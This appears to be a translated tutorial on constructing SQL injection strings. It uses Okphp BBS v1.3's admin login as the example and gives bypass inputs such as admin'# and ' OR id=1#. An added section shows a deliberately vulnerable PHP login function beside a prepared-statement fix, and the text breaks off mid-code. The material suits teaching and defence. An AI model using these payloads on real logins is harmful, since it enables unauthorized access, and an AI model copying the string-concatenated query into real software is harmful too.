PHP+MySQL Injection Statement Construction Techniques
Hacking basics: constructing PHP+MySQL injection statements:
I. Preface:
Tested version: Okphp BBS v1.3 open-source edition
Because of the nature of PHP and MySQL themselves, injection against PHP+MySQL is harder than against ASP, and constructing the injected statement is the trickiest part. This article uses a brief analysis of a few files from Okphp BBS v1.3 to discuss how PHP+MySQL injection statements are constructed; I hope it is of some help to you.
Disclaimer: none of the "vulnerabilities" mentioned in this article have been tested and they may not exist at all. Whether they exist is actually not important; what matters is the analytical approach and the statement construction.
II. "Vulnerability" analysis:
1. Injection in admin/login.php allows the authentication check to be bypassed:
Code:
$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
$password = md5($password);
$q = "select id,group_id from $user_table where username='$username' and password='$password'";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);
In $q = "select id,group_id from $user_table where username='$username' and password='$password'",
$username and $password are not filtered, so the check is easily bypassed.
For a statement of the form select * from $user_table where username='$username' and password='$password', the ways to reshape it are:
Construction 1 (using logical operators): $username=' OR 'a'='a  $password=' OR 'a'='a
This is equivalent to the SQL statement:
select * from $user_table where username='' OR 'a'='a' and password='' OR 'a'='a'
Construction 2 (using MySQL's comment syntax, # or /*, to comment out the $password part): $username=admin'# (or admin'/*)
That is:
select * from $user_table where username='admin'#' and password='$password'
which is equivalent to:
select * from $user_table where username='admin'
In admin/login.php, the $password in the $q statement is md5-hashed before the query, so the injected password from construction 1 never reaches the query as SQL and cannot be used to bypass it. Here we use construction 2:
select id,group_id from $user_table where username='admin'#' and password='$password'
which is equivalent to:
select id,group_id from $user_table where username='admin'
This succeeds as long as a user named admin exists. If the username is unknown but the corresponding id is,
we can construct: $username=' OR id=1#
which is equivalent to:
select id,group_id from $user_table where username='' OR id=1# and password='$password' (everything after # is commented out)
Let's continue reading the code:
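The root cause of all three constructions is the same: user input is concatenated into the SQL text, so a quote or a # is interpreted as syntax rather than data. The following is an added example (not Okphp's code) that places the login.php pattern beside a prepared-statement version; it assumes a PDO connection $pdo and the table and column names used above ($user_table with id, group_id, username, password).

```php
<?php
// Added example, not from Okphp BBS. Assumes a PDO connection and the
// article's table layout: $user_table(id, group_id, username, password).

// Vulnerable: $username and the md5 of $password are concatenated straight
// into the SQL text, so a username such as  admin'#  closes the string
// literal early and comments out the password check (construction 2).
function login_vulnerable(PDO $pdo, string $user_table, string $username, string $password): ?array
{
    $password = md5($password);
    $q = "select id,group_id from $user_table where username='$username' and password='$password'";
    $row = $pdo->query($q)->fetch(PDO::FETCH_NUM);
    return $row === false ? null : $row;
}

// Fixed: the SQL text contains only placeholders; the user-supplied values
// are passed separately as parameters, so ' and # are plain data and can
// no longer change the shape of the statement.
function login_safe(PDO $pdo, string $user_table, string $username, string $password): ?array
{
    // A table name cannot be a bound parameter: it must come from trusted
    // configuration, never from the request.
    $q = "select id,group_id from $user_table where username=? and password=?";
    $stmt = $pdo->prepare($q);
    // md5() is kept only to match the article's schema; new code should
    // store password_hash() output and compare with password_verify().
    $stmt->execute([$username, md5($password)]);
    $row = $stmt->fetch(PDO::FETCH_NUM);
    return $row === false ? null : $row;
}

// Usage sketch with constructed values (DSN and credentials are placeholders):
// $pdo = new PDO('mysql:host=localhost;dbname=bbs', 'dbuser', 'dbpass',
//                [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
// var_dump(login_vulnerable($pdo, 'users', "admin'#", 'anything')); // admin's row; password never compared
// var_dump(login_safe($pdo, 'users', "admin'#", 'anything'));       // NULL; no user is literally named admin'#
```

Because the fixed version sends the same bytes as data, the logging of failed logins will show the literal username admin'# rather than a successful admin login, which is also the signal to alert on.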
if ($row[0]) {
// If not admin or super moderator
if ($username != "admin" && !eregi("(^|&)3($